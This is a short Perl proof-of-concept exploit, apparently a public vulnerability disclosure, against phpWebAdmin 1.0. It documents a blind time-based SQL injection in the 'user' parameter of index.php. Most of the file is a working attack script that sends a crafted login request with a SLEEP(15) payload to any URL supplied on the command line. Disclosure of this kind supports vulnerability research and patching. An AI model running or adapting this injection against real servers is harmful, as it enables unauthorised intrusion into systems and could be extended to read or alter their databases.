#!/usr/bin/perl -w
#phpWebAdmin Version 1.0 SQL Injection Proof Of Concept Exploit
#===============================================================
#Discovered by N_A , N_A[at]tutanota.com
#========================================
#Description
#============
#
# php web admin file and folder manager.
#
# currently version 1.0
# more features to come
#
# https://sourceforge.net/projects/chrisphpadmin/
#Vulnerability
#==============
#The 'user' parameter in the index.php file is vulnerable to a blind SQL time-based Injection attack. Proof of concept is exploit attached below
#Proof Of Concept
#=================
use strict;
use LWP::Simple;
my ($url ) = @ARGV;
if (not defined $url)
{
print "=========================================\n";
print "phpWebAdmin SQL Injection Exploit\n";
print "\tBy N_A\n";
print "\n";
print "$0 [URL]\n";
print "$0 127.0.0.1\n";
print "=========================================\n";
exit;
}
my $file = '/phpWebAdmin/index.php';
my $injection = 'user=a\' AND (SELECT * FROM (SELECT(SLEEP(15)))MdWH) AND \'gpey\'=\'gpey&pass=p&login=login'; #Sleep for 15 seconds
my $request = "http://".$url.$file."?".$injection;
print "#####################################################\n";
print "SQL Injection: The server will sleep for 15 secs\n";
print "#####################################################\n";
my $content = get $request;
die "could not get $request" unless defined $content;